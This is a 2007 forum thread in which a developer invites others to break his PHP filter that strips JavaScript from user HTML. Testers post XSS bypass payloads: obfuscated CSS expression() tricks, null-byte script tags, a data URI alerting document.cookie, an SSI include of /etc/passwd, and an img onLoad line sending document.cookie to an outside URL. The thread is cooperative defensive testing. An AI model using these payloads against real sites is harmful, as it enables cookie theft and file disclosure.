Hello everyone,

For a little while now I have been tweaking and revising a forum extension meant to strip out javascript from html, which I originally threw together as a better replacement for the previous one. Firstly I'd just like to thank rsnake for his comprehensive list of possible xss attacks; I've found the page to be extremely useful in trying to make this a safe but 'defensive' filter (by defensive I mean it tries to alter the original content as little as possible).

So I've tried every xss example on rsnake's page against it, and seems to manage to catch every one (although I'm not too sure about the js include thing, as I haven't actually tried that so I'm not 100% sure replacing the ampersand with & would work or not...) However, one can never be too sure, so I'd be really gratful if some of you guys could test it for me. Just, like, try to find a way to insert js :-P

You can find a test page here: http://sirnot.110mb.com/htmlformatter.php
and the source here: http://sirnot.110mb.com/htmlformatter.php.txt
(and here's a version with purdy colors: http://sirnot.110mb.com/htmlformatter.php.html )

Thanks in advance for any help :-)

very nice work! i will definitely give it a try.

The page times out.

damnit, I swear I am cursed to have bad luck with free web hosts...

well here's the source, at least: http://sirnot.googlepages.com/htmlformatter.php.txt

It works now, looks like it works pretty well, but it is a little strange, how it changes onload to #111;nload.. I wonder if this could somehow be exploited?

This looks really interesting. I'm going to play with it for a bit. So far so good though. Thanks for the contribution, SirNotAppearingOnThisForum!

- RSnake
Gotta love it. http://ha.ckers.org

@spikeman: it changes things like on[whatever] to an html entity equivelent so urls and other legitimate attributes that happen to have that combination aren't messed up. Eg. a url like ht tp://example.com/bla?onregister=redirect would still function normally if the onregister was changed to onregister.

thanks to everyone for taking the time to look at it :-)

EDIT: fixed url example



Edited 4 time(s). Last edit at 01/22/2007 12:58PM by SirNotAppearingOnThisForum.

Pretty, pretty cool!

I gave it a spin just now with a few nulls:

I inputted this:
<s%00cript src="http://www.google.com/b0mbs.js"></SCRIPT>

I got this as result:
<s%00cript src="http://www.google.com/b0mbs.js"></s%00cript>


But I see that in the source the result is different then on screen? intentionally?

I see that 's' is replaced with an cariage return: &#115;

Okay, I found one that definitely works around your filter, SirNotAppearingOnThisForum:

<A STYLE='xss:ex&&#x23;x2F;*XSS*//*/*/p/*/pres/*/ression(alert("XSS"))'>asdf</a>

Good try though. Keep working on it!

- RSnake
Gotta love it. http://ha.ckers.org

ok rsnake, try it now :-P (the source is now at http://sirnot.110mb.com/source.php , by the way; was easier than reuploading each time)

the reason it's a slightly different output, jungsonn, is because it a) removes all instances of <script> and </script> and b) it tries to make sure there aren't any stray opening/closing tags. As a consequence, it removed the closing tag and then recreated it.



Edited 1 time(s). Last edit at 01/22/2007 01:31PM by SirNotAppearingOnThisForum.

This seems to get through:

<A STYLE='xss:expression\(alert("XSS"))'>asdf</a>

- RSnake
Gotta love it. http://ha.ckers.org

I asume <ilayer> get's through also, but that's NS4.

But, i'm actually impressed by your work, without doubt one of the better filters i've seen so far regarding HTML input. Do you mind if I host it myself? ofcorse with credits and a blog notation about it.

edit: I guess a bigger array with more vectors would solve alot more



Edited 1 time(s). Last edit at 01/22/2007 02:08PM by jungsonn.

@rsnake: is that the only character that works there? do you know if it work for url()'s too (all the browsers I'm using seem to have stopped supported js in css urls...)?

should be fixed for that one, though.

@jungsonn: sure, if you want to, but if I were you I'd wait until rsnake has stopped finding loopholes in it :-P



Edited 1 time(s). Last edit at 01/22/2007 02:31PM by SirNotAppearingOnThisForum.

<A STYLE='xss:expressio&#92;n(alert("XSS"))'>asdf</a>

- RSnake
Gotta love it. http://ha.ckers.org

Sorry, I should have responded to your initial question. After checking my fuzzer it looks like only null and \ work in UTF-8.

- RSnake
Gotta love it. http://ha.ckers.org



Edited 1 time(s). Last edit at 01/22/2007 03:24PM by rsnake.

Yeah you bet I wait ^^


I got a few more:

<s\0cript>

<ilayer src="http://www.google.com">

Alerting document.cookie:
data:text/plain;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ+

SSI:
</!--%20#include%20virtual="../../etc/passwd"%20-->

Here's another one (no obfuscation whatsoever):

<A style=xss:expression(alert("XSS"))>asdf</a>

- RSnake
Gotta love it. http://ha.ckers.org

Haven't test this one, but think it could work:

<img \0onLoad="javas\0cript:window.open('http://www.google.com/crap.php?c='+document.cookie)">

Oh and a small one to start <script>.
could be usefull if at some place the script is being closed:

<&#83;alert('blah')</&#115;cript>

yikes! those were some major bugs... (your last one, rsnake, was caused by the fact that the regex was non-greedy, and there were no boundries, so it simply retrieved one character)

ok, think I fixed those...

EDIT: make sure to refresh the cache if you're viewing the source



Edited 1 time(s). Last edit at 01/22/2007 04:50PM by SirNotAppearingOnThisForum.

Just tell me when you want me to stop. ;)

<A style=`xss:expression/*
*/(alert("XSS"))`>asdf</a>

- RSnake
Gotta love it. http://ha.ckers.org

Okay, found another five issues:

<A style='xss:expr\0ession(alert("XSS"))'>asdf</a>
<A style='xss:expressione\xpression\(alert("XSS"))'>asdf</a>
<A style='xss:exp&\&#x23;x72;ession(alert("XSS"))'>asdf</a>
<A style='xss:expr/\**/ession(alert("XSS"))'>asdf</a>
<A style='xss:exp&#\x72;ession(alert("XSS"))'>asdf</a>

I think I'm done testing this one for a while. Sorry, SirNotAppearingOnThisForum, looks like this needs some work still.

- RSnake
Gotta love it. http://ha.ckers.org

try to break this one...
10 bucks who can break this filter first

sorry SirNotAppearingOnThisForum, i dont want to steal your thunder. The original idea is still yours.

Cheers -

Anurag Agarwal
SEEC - Application Security Search Engine (http://www.myappsecurity.com)
http://www.attacklabs.com
blog - http://myappsecurity.blogspot.com

oops forgot to mention the url

here it is http://www.attacklabs.com/xssfilter/

Cheers -

Anurag Agarwal
SEEC - Application Security Search Engine (http://www.myappsecurity.com)
http://www.attacklabs.com
blog - http://myappsecurity.blogspot.com

*grumbles incoherently...

I have fixed those, though...

@anurag: the point of this was to allow as much html as possible while stripping out javascript, not to simply remove all html + js.



Edited 1 time(s). Last edit at 01/23/2007 10:15AM by SirNotAppearingOnThisForum.

anurag - I don't believe your filter can be broken without injecting into JavaScript space (since you don't attempt to filter +'s or any forms of quotes) or a selected encoding issue (since you don't remove plusses or minutes). But I think what SirNotAppearingOnThisForum is trying to show is how you can still use HTML without being vulnerable to XSS. And what I am proving is that filters are not as simple as most people think they are.

- RSnake
Gotta love it. http://ha.ckers.org

@rsnake: yepp. take a look at the html purifier sources (in case you didn't which i consider as unlikely) - btw that thing is the only filter i kind of trust and use in productive environments...

Greetings,
.mario

could you just give it one more shot, rsnake? just, like 2 minutes max. I only want to see if it's still reasonably easy to exploit, as I'm sure there will always be a way around it...

regardless, thank you very, very much for you help.

Yeah to be strict: it's for allowing html, and that's a tough nut to crack and do correctly. Thinks SirNot's filter does it pretty good, it's limited to a very few vectors that are left.

Sirnot: If I may say so, You could filter against certain chars on the ASCII chart, could useful cause some exotic chars can break up your PHP functions. like Chinese BIG5 or GBK It's not due to your code, but to PHP's functions itself which allows buffer overflows on multibyte characters above 8 bytes like greek chars in ASCII: &#916;

I wrote a little snippet for myself to not alow ASCII above 175 (most used chars).

preg_match_all('/&#(\d+)/',$input,$chars)
foreach ($chars[1] as $char) {
if ($char > 175) {
# do something
}
}


Anyhow, Your's is getting close to an excellent HTML filter.

well the problem with that is that it needs to remain as international as possible, so regrettably removing chars/entities that are over a certain length wouldn't really be an option. (not sure exactly how 'international' the preg_replace functions are, but at least I'd rather not proactively remove chars > a certain length)



Edited 1 time(s). Last edit at 01/23/2007 11:52AM by SirNotAppearingOnThisForum.